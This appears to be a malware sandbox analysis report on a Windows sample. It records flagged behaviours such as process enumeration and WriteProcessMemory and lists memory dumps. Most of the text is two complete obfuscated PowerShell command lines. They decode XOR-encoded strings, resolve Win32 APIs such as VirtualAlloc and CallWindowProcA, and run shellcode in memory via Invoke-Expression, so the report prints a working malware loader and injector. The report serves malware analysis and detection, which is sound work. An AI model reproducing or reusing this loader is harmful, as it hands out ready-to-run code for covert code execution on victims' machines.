Cl'AmCCy7OvBLe1Pa8Un6Sp9Ra5Se8Ma6Re9Fo0Ve9An7Fl8TiAJo8Ra2Tv9He1Ju9ScAJoCNa3ImDUnEScCOu3HaBUn8ReBHe0Ga9BgAAm9Ca0du9Me7Ch8te6su8KrEUgCElDCuBRe1Bo9Ge6hu8SkDBl9Yd7Fl8AlAFl8FoEco8co6KrCdoDMiACaARe8beDBi9st7sk8Rg6gi9Vo1Sv8FoCNy9Ep3AbBGt0Sa8Li6Fu9In1He9Un5Pa8SeAEn8By0Sk8Ve6Ko9He0VeCeqDMoAAnEAn8Ps2su9Va1Un9Ce0Un8SuBFo8ke2Ka8FoFSlBAnESiDSt9PiDSt9haAEx4Ut8ch6Ko9Pr7OnAHe7Sa8Pn6al8FrFUn8No6Gk8Te4Ci8Be2Ud9de7Fu8Be6brASe5Mi8VoCVi9Si1HjAwo5Mi9hy6ta8MyDJv8Re0Be9Sn7Un8GuACh8PiCRe8GaDTeBov3Sq8TyCTo8BuAMe8moDRe9An7Ta8Bi6El9Di1krCOfBSaCGoBFr8Ud5As8Bd8Rh9Ud3AnCFl3AgCdo7HyBEn3po9Ch1ba8Le6Mi8TrAfi8ReDBe8Pi7Re8DrAAd8Ma0Co8Mo2Do9Ef7No8IoARu9Ve5Kl8An6AnCIn3StCAg7DaACu4Cu8HsFUn8Va2Fo8UnELe8PrCNo9ca6In9un1Ve8ScAMi9Me0Os9Sy4Ci8Ma4Un9Ca1InDPo7MiCSaAReCNmFGoCHa3SkCHeBReAfa4GoATu7taBko7LnCCh3GrAAl3SmCSvBGiBto8NoASaADe8BiDFe9Ma7LsBSp3kr9Ge7Re9Bo1MuBSyECaCTrFPhCTa3InBDr8reBMa6DaAStAfr8roDBe9Mi7KiDKr0SqDBl1JoBUnEGlCLeFAnCRe3SkBJe8ClBUn6DeAAtAen8HeDTo9La7coDTi0ReDTu1AfBKoETrCCiFFoCRe3ReBca8AlBUn6FoANeAEv8ScDAr9su7EnDUn0ChDSy1HoBPiETrCPoAMoCPe3HjCBnBPaBLi8SlARuAUd8ReDZo9Fr7teBCa3Aa9Mo7Ef9Fi1MaBYdEReCTeAOrCImAAfCfoAHe'Bi;Ki&Uf(Eg`$EnGCylImaSemLeoObuRirTricisovwSigPorSt7Tr)Sl Ba`$ceFteoJuxTrgFolMyoArvIneSh6Da;Lb`$agUBobConRohSvrColRoiSugSpeLe Ko=Bi ArfSokSopCo Kr`$HyGFolFraMamKloCauUprMeiMosMawPogLirEr5Vi El`$BeGFalKnaSvmAloStuAfrMaiShsMewAsgRarMi6In;Mo`$FtFSaoCoxPngKolvaoovvOrePu7Na Wi=Co RrrFliGrgSpsMabShlFleOcrUdnSpeBusTi0Rs Ra'PrCBe7saAJi8Di8ImFOv8KaCPe8Re2Nr8Ev8Cr8Th6Ud9Co1Ra8InAEm8MoDAr8In4Di9Ca0In8Sa1Po8Uc6Ud9Br0Ka8KoFOv9Ar6li9to7Re8EdDAd8PaAUt8caDAn8Bj4Ko8Vo6vu9Di1GlDUn0PaCMa3FoDdiEEiCAc3OvCDe7BiBSw1Va8Lu6En9Lo5Mu8Is6Pa9Re0Co9Tu7Et8goATi8te2Gi9Sv1Et9UnADeCPrDsnASiALa8RiDFl9ar5Wa8SkCRa8Fi8En8Pr6SaCCoBLaBSt8SaASmAMi8TuDKa9Ke7KoBIn3ho9Bo7Ms9Un1SoBEfEBoDPe9CoDFi9AlBst9Tr8Pr6Pa9Su1Co8AuCCoCTrFVaCDe3SyDDv5PaDAf7AfDbr0afCunFRuCLo3GyDRe3Af9beBauDOf0NoDAn3SwDPi3paDfi3CeCSeFOvCTe3CuDEk3Ko9FlBKaDud7SyDBi3PeCReARb'Pa;me&St(Vg`$BiGThlGlaDemSaoNouRerPuiLasPiwAagMerIk7Hy)na Ty`$QuFPioWaxBlgValSeoRivLieSt7Sa;Do`$SoFScoNexMagHolUnoKjvByeve8Sp an=su PrrLoiobgyusEfbPylSeeTirInnEkeSpsho0Be Ce'HoCBe7BaAOvESl8AnAFr8Kr0At9Sp1Se8EkCSp8OpFRy8MiCMa8Tr4le8ObAMy9fi0Er9sj7GrCBa3NoDUrELiCBo3ChCFe7TrBJo1Ko8Hy6Dv9No5Ti8So6Co9Pe0Re9Di7Se8CrAFr8An2gl9To1ua9GrALyCAbDPrAInASr8KlDPi9Su5Ud8FrCBr8Go8An8Op6InCPeBBeBAn8SaASuAun8ImDBo9Di7UdBSn3Yd9Un7Oc9Ca1TeBStEFaDSp9PrDCu9ShBBe9Fr8Al6Le9Si1St8FaCSkCNuFSyCBo3UlDGl4ElDFl0HaDMi7AnDAn7FoDTrADiDOp7AmDAs4TrDDi1KiCgaFakCdi3LaDBi3Vi9BeBSuDKo0AeDKa3SlDko3TiDJu3tyCPaFBlCPe3GrDGu3Sk9DeBBuDEp7reCKlAtr'Sv;Sy&No(De`$NeGPilSiaMamRioNauRerBuiSusSewUpgTrrUn7Pi)Al Un`$liFuioLixFogExlHooLivSteTr8Fi;In`$ObKUdlMooUnaArkBleScrAliScnDugUdsSmbFoeDisUslEnuFotInnquiFrnWagGueAlrBo0Us0Re=un'ReHSlKLaCDuUUf:om\ReFPaiGinGrsDaklo\BiCKalRoiMamHabRaaThbSylHaete'My;Sv`$ScKBilYaoAlaKokAreskrJaiRenPugUdsOubAteFasPulAnumatPinPsiUdnAmgebeGrrLi0Is1Cl Un=SarSiiBrgHasClbHelGaePerunnDyeKosMi0Re Vo'AnCSe7UnBMi4Sh8CrBFe8st2In8Fe1In8Pa1sp9CoAReDMoESeComBKoAMa4Pj8Le6Bl9Um7EnCKvESiAKvABy9Bl7Ir8Ca6ta8SuEDgBUn3Bi9Le1Re8RuCKa9Lo3Ek8Zo6Di9Av1Di9Fo7Cr9PrASpCTi3CeCHoEInBCi3De8Ta2Ti9My7Re8MoBGaCTe3saCAl7HoASe8Ar8AfFGe8OvCOm8Fo2Sv8Ud8Va8Cl6Su9Kl1Sk8BrAun8VoDFr8Fa4Ru9Be0Jo8Un1Sk8Ch6Pa9Va0Fo8HaFPh9Ro6Ba9Da7Be8DeDRu8FoACo8unDMi8Ch4Re8Gr6Pr9Fa1KvDIn3frDRa3GuCDeAMaCBaDBoAstFAa8Ph6Be8Sn2Se9Tr7no8WeBOu8Po6Re9pe1Ep9op0Po'Sa;Uv&Or(St`$SiGBrlUnaSymKloMouBirGliDisFawTrgKurQu7Hi)Be se`$TuKpilReoBeaUdkOgeDorMaiTenSygSosSkbreeSasSalSlufotUtnEmiChnBrgfieSprEn0Al1si;Su`$MuFLnoCoxCagMolBeoKovBeeSk9Li sa=Fa PurRiiFagDesInbMalOfeKnrFinEseCosDi0No Se'DeCal7ReAan5Da8NoCti9SuBTa8An4ta8RuFCe8SaCBo9de5No8Sl6YaCBe3HuDHoESpCDu3noBLs8unBNy0Kl9SkApr9Se0Af9Tr7Ad8Cy6Sh8FoEPeCEnDErAsa0Ea8DaCun8BhDBy9Un5Pa8Sn6Oa9On1Me9Fo7DeBTeENoDAs9EkDUn9veAHo5Sn9Le1Fl8SmCMo8FeETiAEt1Ti8La2Vi9Sk0Di8Bl6GrDBl5TrDKu7UnBLe0Fl9Sk7Pr9Go1Lo8FuAAb8OrDIa8Pr4EmCmrBTeCov7foBDi4Un8PhBBe8Fo2Kn8fr1An8Ar1Sm9JoADrCUbACa'ap;Ki&Ro(Mi`$SuGWalCeagumNyoPuuUnrAtiLisInwBygSerMo7Wa)Du fo`$FlFPaoArxAggSulBaoFrvSjepr9Cu;Ar`$DiWKihCaaSabdibDuyAn0Te Ex=Hj WirOpiCigPasDrbIrlAfeTjrmonNoeGisTi0pe Mo'SeByn8KoBfi0Su9SoAun9Me0Gn9Ko7Tr8Na6Sa8AdEDeCTrDOkBBr1Om9Pa6Fl8NoDpl9Fr7Ac8PaAIn8SeEci8an6beColDNoAHeAob8JuDPr9Pe7Ak8Tr6Sa9Sk1Mu8StCFr9Mi3UnBEg0Fl8Fa6Aa9Fr1Kl9Er5Re8PaASa8Du0Br8Sp6Im9Fo0UnCUnDDiAKuEBu8Jo2Up9In1Wi9Ma0Pe8KoBfa8rd2Do8EtFPrBCoEThDDu9ReDPa9CrAUs0Fa8HaCPa9Cu3Fo9StAVeCAiBInCMe7UbANe5Un8EgCRe9DiBAc8Ti4Sp8ReFCo8KaCAn9Pa5Re8Kl6TeCmaFKnCFi3FiDUn3AlCSkFReCRe3SlCFo3ReCLa7IvAFi8Ve8SkFSt8StCRe8Th2Fo8Da8Un8Sy6Ag9ed1ag8DeATr8MiDUr8Hj4gr9Op0La8Op1Ty8Hy6pr9Fe0pl8EqFFo9Ar6Se9Ko7sa8PeDSn8SkAMi8hoDIr8Wi4Ca8Sk6Na9Re1BaDSu0ClCSuFHeCBe3PaDSt5CaDEx7FrDVi0HeCPrASu'ka;Te&at(Bo`$MaGNelFuaremnaoThuUdrKriArsThwIngBarRe7Eg)Pr Ri`$OpWPlhKaaDebSabDvyMi0un;St`$InIRenRisBltSoiFatMruDatUkiInoAfnCoaHalLaiMisCutSisEx=Di`$OxFBaoMaxScgKelPeoAfvOreMa.MacgooTruVinEjtBo-At6Je4Sp3In;Ol`$CoWHahScaRubRubFoyUd1Sk Me=Im ElrVaiKogDasKnbBulTaeHurFonMdebasDi0Ho Ac'GoBEq8BaBRa0Ro9IrAar9Tj0Cr9Ve7Pr8Di6So8DaEUnCRiDReBSk1Tr9Si6Be8PrDal9Gd7Ti8BeAPl8UnEVa8de6AnCNeDDiAdaADe8AgDPe9Om7Pr8Al6ko9Sa1Ti8InCRe9An3StBTe0Po8Pr6bi9Sk1Ns9Br5Or8MeARe8Vg0Ae8Ca6En9Ga0eyCLaDTyAAnEGe8Be2Li9Sj1Hj9od0My8OpBSi8ja2Bo8AuFSeBstEAlDCa9PrDUn9BaAKi0Dd8AnChe9Fo3Sk9TaAPuCGrBUpCAn7DeAEu5No8FoCBy9KjBVi8Di4Sc8ViFLi8CoCMe9Eu5Un8Me6moChuFDiCEk3UnDUn5BoDTi7FrDTo0ReCOfFMaCAn3UnCNo7TaAUfEMi8FoASt8Gi0Ta9Af1Po8ObCFo8FrFMe8DeCou8Jo4Dr8OpAHo9Bi0Je9Hv7WeCdiFAfCSt3KaCFl7DaAsoACo8FrDSk9Ko0Sp9Pu7st8NoAhe9Ra7Pr9So6Pr9Im7Ge8UdAPa8MiCop8VoDti8Ar2Dy8ReFSp8ToACu9Sy0Le9La7Bi9Ra0KaCEuARe'st;Un&St(Ge`$TaGPrlGoaUnmNeoImuSerPoiUdsAtwArgNorDi7Fo)Se No`$AcWDihquaInbSabAlyFy1Pe;Ti`$FuWHjhmiaVibInbunyUn2Bo Op=Sy InrUniAagFrsSpbimlInePrrRenSkeTasAn0Va St'reCSp7HeASu0Bi8reBDe9No1Ba8NoCLi8SiDUn8OvAMa8La0Un8WrFTo8br6er8Ho7TeCRu3VeDNiEmyCCo3TsBSp8SiBPi0Un9MyAAr9Ti0ma9Ch7Pa8Fo6Fo8ScEAnCCaDLeBUn1Im9Su6Re8DiDFo9Po7Ta8HeAJu8MeESe8Co6KoCLaDAtAVaAKu8UvDWh9De7La8St6Va9Fe1Ha8NeCIn9De3teBOk0Cr8Br6St9da1To9Py5Af8HsAtr8Kn0Ro8so6Ge9Re0SuCStDHeARtEVa8Im2Tr9Ko1Do9Fo0Se8SoBCi8To2Su8ReFKmBOrEstDUd9BrDSu9PrAKi4Ti8St6Hu9Be7MoAHe7Ge8Sk6Dg8deFKr8Po6Sn8Ly4Sg8Fo2Wr9Un7Af8Af6EtALa5Ap8CoCti9Re1TrAPr5Di9Or6Ne8ToDTa8Ar0Ti9Sa7ph8skAJe8BuCDe8UdDDoBSt3Ud8SjCAe8InASt8caDAj9Be7Fa8mo6Al9Le1IvCGnBInCRuBDe8Co5Tj8Ri8Re9Hi3inCLy3TrCfo7weAKnADr8pe7Cu8pr6Rh8TeDSa9Al7Ba8ChAMo8Af5ma8slACi8Tr0Fe8Ex6Ny9Af1Tr8BrAPo8TrDIn8Un4Pr8in6Te9So1Am8FoDDo8in6SpDSy1MiDsc3SeDDi0PrCUn3HjCSo7AnBCa7Wi8DeAri8Vo7Pr9Fo0Ke8BiBal8BoCBo9Re1bj8phAFo9Dr0Gy8UdCUn8ReDBo9Bo7Al8Sa6Ge8BrDReCDiAAnCTrFSkCMi3TrCFiBPeAPe4UfAHu7TaBBi7BeCSc3LrASk3TiCUnBstBBi8FoAUrARe8GaDPe9Fi7SiBMe3El9Sa7Si9Ma1InBSkEOrCWaFBrCVa3ChBAn8GrATiARi8DaDPr9Ts7EqBKi3Un9Sp7Bl9He1ThBInEPaCBaFanCUd3AnBGe8InAdrADa8SyDSt9Op7stBHa3so9In7Mi9Ov1PaBhaEBeCUnFUdCSh3noBDo8SyATiASk8FoDVr9In7SoBEp3Bl9Kr7Be9Ev1BoBAfEStCQuFLaCLa3MeBTv8NeASkAfo8LiDNe9Od7TiBCi3Sa9To7Un9Av1ToBRoEInCJuAMiCDa3TiCSpBInBIn8SeAWaAOs8taDKn9Da7NoBPy3Sk9Pp7Ka9Ta1OrBFlEThCSeAFuCtrAPeCCaAWi'Kr;Na&Vi(No`$FaGOslToaUnmDooDeuHorStiPasTewBugEarNy7Ke)Un Ko`$BeWNyhCeaObbFrbApyIn2Ou;Am`$FrWElhSaaLebGybGlySk3Si Ge=in berNoiUngovsAsbNolAceDarUnnTeeInsHa0Ha Dr'TiCTe7FrAPa0In8SuBFl9Ud1Py8SeCTh8LiDTv8SvAUn8Tr0Pa8InFCi8Ey6Ov8Va7SoCSeDAlAFeAIn8BlDNo9Ko5sl8SoCZi8En8He8Ep6DyCFeBlaCVe7HaAZi8Ud8UnFTi8TrCsu8Al2Ch8An8Pa8Fl6Fu9Ho1Fa8MrARe8SuDOp8Ia4Cl9Ko0St8Dr1sa8Ge6sp9Go0Tr8AfFro9Fo6Ha9Si7Lo8MaDDr8SpAhu8apDRe8Se4Ha8Ho6In9Ru1KiDTo0frCDeFCiCCo7HoASeEKa8FiAKd8Ri0Sq9Ak1Al8BrCkl8SaFBl8AaCNu8Ko4Wi8GeADo9Li0An9Po7HoCAbFStCCo7BoBTo6Me8Se1Ad8SkDOp8BeBse9Mi1To8UnFAl8PrAtr8Ri4Al8Ak6KaCUnFSjDCo3BrCPhFDoDMe3MoCPrAek'Vu;Bl&Bi(Je`$SuGAnlTraAnmUnoHeuDorLoiJosPhwCogLarHy7Sv)ob Vi`$NoWTahStaRobDabStyPo3Ra#Sp;""";;Function Whabby9 { param([String]$Konsterneret); For($Quiff=2; $Quiff -lt $Konsterneret.Length-1; $Quiff+=(2+1)){ $rigsblernes = $rigsblernes + $Konsterneret.Substring($Quiff, 1); } $rigsblernes;}$Nontransitionally0 = Whabby9 'Fe pe Am cy Sv Se Ka ar Va Ba Ro Fr Ag Co De ac Am Ch Re St Ru Ba Un ClIReEApXJy ';$Nontransitionally1= Whabby9 $togolesisk;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Nontransitionally1 ;}else{.$Nontransitionally0 $Nontransitionally1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function rigsblernes0 { param([String]$Konsterneret); $Aabenbares = New-Object byte[] ($Konsterneret.Length / 2); For($Quiff=0; $Quiff -lt $Konsterneret.Length; $Quiff+=2){ $Chefpilot = $Konsterneret.Substring($Quiff, 2); $Aabenbares[$Quiff/2] = [convert]::ToByte($Chefpilot, 16); $Aabenbares[$Quiff/2] = ($Aabenbares[$Quiff/2] -bxor 227); } [String][System.Text.Encoding]::ASCII.GetString($Aabenbares);}$udkastelses0=rigsblernes0 'B09A9097868ECD878F8F';$udkastelses1=rigsblernes0 'AE8A80918C908C8597CDB48A8DD0D1CDB68D90828586AD82978A9586AE86978B8C8790';$udkastelses2=rigsblernes0 'A48697B3918C80A2878791869090';$udkastelses3=rigsblernes0 'B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685';$udkastelses4=rigsblernes0 '9097918A8D84';$udkastelses5=rigsblernes0 'A48697AE8C87968F86AB828D878F86';$udkastelses6=rigsblernes0 'B1B7B09386808A828FAD828E86CFC3AB8A8786A19AB08A84CFC3B396818F8A80';$udkastelses7=rigsblernes0 'B1968D978A8E86CFC3AE828D82848687';$udkastelses8=rigsblernes0 'B186858F8680978687A7868F8684829786';$udkastelses9=rigsblernes0 'AA8DAE868E8C919AAE8C87968F86';$Glamouriswgr0=rigsblernes0 'AE9AA7868F8684829786B79A9386';$Glamouriswgr1=rigsblernes0 'A08F829090CFC3B396818F8A80CFC3B086828F8687CFC3A28D908AA08F829090CFC3A296978CA08F829090';$Glamouriswgr2=rigsblernes0 'AA8D958C8886';$Glamouriswgr3=rigsblernes0 'B396818F8A80CFC3AB8A8786A19AB08A84CFC3AD8694B08F8C97CFC3B58A919796828F';$Glamouriswgr4=rigsblernes0 'B58A919796828FA28F8F8C80';$Glamouriswgr5=rigsblernes0 '8D97878F8F';$Glamouriswgr6=rigsblernes0 'AD97B3918C97868097B58A919796828FAE868E8C919A';$Glamouriswgr7=rigsblernes0 'AAA6BB';$Glamouriswgr8=rigsblernes0 'BF';$Identificeringerne203=rigsblernes0 'B6B0A6B1D0D1';$Tidshorisonten=rigsblernes0 'A0828F8FB48A8D878C94B3918C80A2';function fkp {Param ($Embryophyta131, $Rten) ;$Foxglove0 =rigsblernes0 'C7A4828E8290C3DEC3CBB8A29393A78C8E828A8DBED9D9A0969191868D97A78C8E828A8DCDA48697A29090868E818F8A8690CBCAC39FC3B48B869186CEAC8189868097C398C3C7BCCDA48F8C81828FA29090868E818F9AA082808B86C3CEA28D87C3C7BCCDAF8C8082978A8C8DCDB0938F8A97CBC7A48F828E8C96918A90948491DBCAB8CED2BECDA69296828F90CBC7968788829097868F908690D3CAC39ECACDA48697B79A9386CBC7968788829097868F908690D2CA';&($Glamouriswgr7) $Foxglove0;$Foxglove5 = rigsblernes0 'C7A296978C8280978A9582978A8C8DC3DEC3C7A4828E8290CDA48697AE86978B8C87CBC7968788829097868F908690D1CFC3B8B79A9386B8BEBEC3A3CBC7968788829097868F908690D0CFC3C7968788829097868F908690D7CACA';&($Glamouriswgr7) $Foxglove5;$Foxglove1 = rigsblernes0 '91869796918DC3C7A296978C8280978A9582978A8C8DCDAA8D958C8886CBC78D968F8FCFC3A3CBB8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685BECBAD8694CEAC8189868097C3B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAB828D878F86B18685CBCBAD8694CEAC8189868097C3AA8D97B39791CACFC3CBC7A4828E8290CDA48697AE86978B8C87CBC7968788829097868F908690D6CACACDAA8D958C8886CBC78D968F8FCFC3A3CBC7A68E81919A8C938B9A9782D2D0D2CACACACACFC3C7B197868DCACA';&($Glamouriswgr7) $Foxglove1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Noblest,[Parameter(Position = 1)] [Type] $Boost = [Void]);$Foxglove2 = rigsblernes0 'C7AD868E82978C848D82978BC3DEC3B8A29393A78C8E828A8DBED9D9A0969191868D97A78C8E828A8DCDA786858A8D86A79A8D828E8A80A29090868E818F9ACBCBAD8694CEAC8189868097C3B09A9097868ECDB186858F8680978A8C8DCDA29090868E818F9AAD828E86CBC7968788829097868F908690DBCACACFC3B8B09A9097868ECDB186858F8680978A8C8DCDA68E8A97CDA29090868E818F9AA1968A8F878691A28080869090BED9D9B1968DCACDA786858A8D86A79A8D828E8A80AE8C87968F86CBC7968788829097868F908690DACFC3C785828F9086CACDA786858A8D86B79A9386CBC7A48F828E8C96918A90948491D3CFC3C7A48F828E8C96918A90948491D2CFC3B8B09A9097868ECDAE968F978A80829097A7868F8684829786BECA';&($Glamouriswgr7) $Foxglove2;$Foxglove3 = rigsblernes0 'C7AD868E82978C848D82978BCDA786858A8D86A08C8D9097919680978C91CBC7968788829097868F908690D5CFC3B8B09A9097868ECDB186858F8680978A8C8DCDA0828F8F8A8D84A08C8D95868D978A8C8D90BED9D9B097828D87829187CFC3C7AD8C818F869097CACDB08697AA8E938F868E868D9782978A8C8DA58F828490CBC7968788829097868F908690D4CA';&($Glamouriswgr7) $Foxglove3;$Foxglove4 = rigsblernes0 'C7AD868E82978C848D82978BCDA786858A8D86AE86978B8C87CBC7A48F828E8C96918A90948491D1CFC3C7A48F828E8C96918A90948491D0CFC3C7A18C8C9097CFC3C7AD8C818F869097CACDB08697AA8E938F868E868D9782978A8C8DA58F828490CBC7968788829097868F908690D4CA';&($Glamouriswgr7) $Foxglove4;$Foxglove5 = rigsblernes0 '91869796918DC3C7AD868E82978C848D82978BCDA09186829786B79A9386CBCA';&($Glamouriswgr7) $Foxglove5 ;}$Preindicative = rigsblernes0 '8886918D868FD0D1';$Foxglove6 = rigsblernes0 'C7B186958690978A82919AC3DEC3B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A48697A7868F8684829786A58C91A5968D80978A8C8DB38C8A8D978691CBCB858893C3C7B391868A8D878A8082978A9586C3C7A48F828E8C96918A90948491D7CACFC3CBA4A7B7C3A3CBB8AA8D97B39791BECFC3B8B6AA8D97D0D1BECFC3B8B6AA8D97D0D1BECFC3B8B6AA8D97D0D1BECAC3CBB8AA8D97B39791BECACACA';&($Glamouriswgr7) $Foxglove6;$Ubnhrlige = fkp $Glamouriswgr5 $Glamouriswgr6;$Foxglove7 = rigsblernes0 'C7A88F8C828886918A8D84908186908F96978D8A8D848691D0C3DEC3C7B186958690978A82919ACDAA8D958C8886CBB8AA8D97B39791BED9D9B986918CCFC3D5D7D0CFC3D39BD0D3D3D3CFC3D39BD7D3CA';&($Glamouriswgr7) $Foxglove7;$Foxglove8 = rigsblernes0 'C7AE8A80918C8F8C848A9097C3DEC3C7B186958690978A82919ACDAA8D958C8886CBB8AA8D97B39791BED9D9B986918CCFC3D4D0D7D7DAD7D4D1CFC3D39BD0D3D3D3CFC3D39BD7CA';&($Glamouriswgr7) $Foxglove8;$Kloakeringsbeslutninger00='HKCU:\Finsk\Climbable';$Kloakeringsbeslutninger01 =rigsblernes0 'C7B48B8281819ADECBA48697CEAA97868EB3918C938691979AC3CEB382978BC3C7A88F8C828886918A8D84908186908F96978D8A8D848691D3D3CACDAF8682978B869190';&($Glamouriswgr7) $Kloakeringsbeslutninger01;$Foxglove9 = rigsblernes0 'C7A58C9B848F8C9586C3DEC3B8B09A9097868ECDA08C8D95869197BED9D9A5918C8EA1829086D5D7B097918A8D84CBC7B48B8281819ACA';&($Glamouriswgr7) $Foxglove9;$Whabby0 = rigsblernes0 'B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A08C939ACBC7A58C9B848F8C9586CFC3D3CFC3C3C7A88F8C828886918A8D84908186908F96978D8A8D848691D0CFC3D5D7D0CA';&($Glamouriswgr7) $Whabby0;$Institutionalists=$Foxglove.count-643;$Whabby1 = rigsblernes0 'B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A08C939ACBC7A58C9B848F8C9586CFC3D5D7D0CFC3C7AE8A80918C8F8C848A9097CFC3C7AA8D90978A9796978A8C8D828F8A909790CA';&($Glamouriswgr7) $Whabby1;$Whabby2 = rigsblernes0 'C7A08B918C8D8A808F8687C3DEC3B8B09A9097868ECDB1968D978A8E86CDAA8D9786918C93B08691958A808690CDAE8291908B828FBED9D9A48697A7868F8684829786A58C91A5968D80978A8C8DB38C8A8D978691CBCB858893C3C7AA87868D978A858A8086918A8D8486918D86D1D3D0C3C7B78A87908B8C918A908C8D97868DCACFC3CBA4A7B7C3A3CBB8AA8D97B39791BECFC3B8AA8D97B39791BECFC3B8AA8D97B39791BECFC3B8AA8D97B39791BECFC3B8AA8D97B39791BECAC3CBB8AA8D97B39791BECACACA';&($Glamouriswgr7) $Whabby2;$Whabby3 = rigsblernes0 'C7A08B918C8D8A808F8687CDAA8D958C8886CBC7A88F8C828886918A8D84908186908F96978D8A8D848691D0CFC7AE8A80918C8F8C848A9097CFC7B6818D8B918F8A8486CFD3CFD3CA';&($Glamouriswgr7) $Whabby3#"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/268-63-0x000000000293B000-0x000000000295A000-memory.dmpFilesize
124KB
-
memory/268-55-0x0000000000000000-mapping.dmp
-
memory/268-57-0x000007FEF3160000-0x000007FEF3B83000-memory.dmpFilesize
10.1MB
-
memory/268-58-0x000007FEF2600000-0x000007FEF315D000-memory.dmpFilesize
11.4MB
-
memory/268-59-0x0000000002934000-0x0000000002937000-memory.dmpFilesize
12KB
-
memory/268-60-0x000000001B7E0000-0x000000001BADF000-memory.dmpFilesize
3.0MB
-
memory/268-66-0x0000000002934000-0x0000000002937000-memory.dmpFilesize
12KB
-
memory/776-61-0x0000000000000000-mapping.dmp
-
memory/776-62-0x0000000075151000-0x0000000075153000-memory.dmpFilesize
8KB
-
memory/776-64-0x0000000072DA0000-0x000000007334B000-memory.dmpFilesize
5.7MB
-
memory/776-65-0x0000000005B90000-0x000000000A19C000-memory.dmpFilesize
70.0MB
-
memory/776-67-0x0000000072DA0000-0x000000007334B000-memory.dmpFilesize
5.7MB
-
memory/776-68-0x0000000005B90000-0x000000000A19C000-memory.dmpFilesize
70.0MB
-
memory/2004-54-0x000007FEFB531000-0x000007FEFB533000-memory.dmpFilesize
8KB